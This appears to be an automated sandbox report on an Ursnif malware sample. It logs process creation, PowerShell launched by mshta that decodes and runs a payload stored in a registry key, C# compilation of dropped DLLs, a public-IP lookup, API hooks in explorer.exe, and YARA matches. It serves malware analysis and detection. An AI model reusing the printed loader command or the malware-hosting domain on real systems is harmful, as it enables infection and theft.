Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6740 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:17420 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7160 CREDAT:82960 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4E97.tmp' 'c:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES5D9B.tmp' 'c:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\7849.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: https___purefile24.top_4352wedfoifom.dll	Static PE information: More than 200 imports for KERNEL32.dll
Source: https___purefile24.top_4352wedfoifom.dll	Static PE information: More than 200 imports for USER32.dll

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.pdb source: powershell.exe, 00000018.00000002.885294750.000001D7AFBF4000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 0000001E.00000003.880827092.000000000E420000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 00000020.00000002.858769696.000001A77A0DC000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.pdbXP source: powershell.exe, 00000018.00000002.885632713.000001D7AFC61000.00000004.00000001.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.812525782.0000021F71900000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.822200708.00000205DC350000.00000002.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.pdb source: powershell.exe, 00000018.00000002.885294750.000001D7AFBF4000.00000004.00000001.sdmp
Source:	Binary string: sxs.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source:	Binary string: \xa.pdb source: powershell.exe, 00000018.00000002.858473846.000001D7ABD53000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: CLBCatQ.pdb0t source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.840185909.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 0000001E.00000003.880827092.000000000E420000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.839861744.0000000003F10000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.840185909.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdbltH5r source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb:t source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000025.00000003.866789174.0000000004F20000.00000004.00000040.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.839861744.0000000003F10000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb(t source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 00000020.00000002.858769696.000001A77A0DC000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 00000025.00000003.866580008.0000000004F22000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.pdbXP source: powershell.exe, 00000018.00000002.885294750.000001D7AFBF4000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000025.00000003.866528969.0000000004DE1000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdbk source: WerFault.exe, 00000025.00000003.866803570.0000000004F25000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdb@tl5 source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb\tx5` source: WerFault.exe, 00000025.00000003.866821638.0000000004F28000.00000004.00000040.sdmp

Data Obfuscation:

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))			Jump to behavior

Compiles C# or VB.Net code

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline'	Jump to behavior

PE file contains sections with non-standard names

Source: https___purefile24.top_4352wedfoifom.dll	Static PE information: section name: .data3
Source: https___purefile24.top_4352wedfoifom.dll	Static PE information: section name: .data2
Source: https___purefile24.top_4352wedfoifom.dll	Static PE information: section name: .data5
Source: https___purefile24.top_4352wedfoifom.dll	Static PE information: section name: .data4

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011121B3 push ecx; ret	0_2_011121C3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01112160 push ecx; ret	0_2_01112169
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10004611 push esp; retf	0_2_10004616
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001E53 push 761D85F0h; iretd	0_2_10001E58
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10006C54 push eax; retf	0_2_10006C61
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10003666 push ecx; ret	0_2_10003667
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1007F070 push ecx; ret	0_2_1007F0AB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10001277 push cs; ret	0_2_10001278
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10009AAC push ds; iretd	0_2_10009AAD
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000397F push ecx; ret	0_2_100039FA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1000858B push edx; iretd	0_2_10008591
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10004197 push ebp; retf	0_2_10004199
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100075A8 push edx; iretd	0_2_100075AB
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100095BD push ebx; iretd	0_2_100095BE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_100039E3 push ecx; ret	0_2_100039FA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002FE6 push eax; retf	0_2_100030A4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_1007EFE0 push edx; ret	0_2_1007F041
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0267ACE0 push ecx; ret	0_2_0267ACE9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0267B09B push ecx; ret	0_2_0267B0AB

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Windows\System32\loaddll32.exe

0_2_1007F8B0

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Stores large binary data to the registry

Source: C:\Windows\SysWOW64\WerFault.exe

Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Token\{67082621-8D18-4333-9C64-10DE93676363} DeviceTicket

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
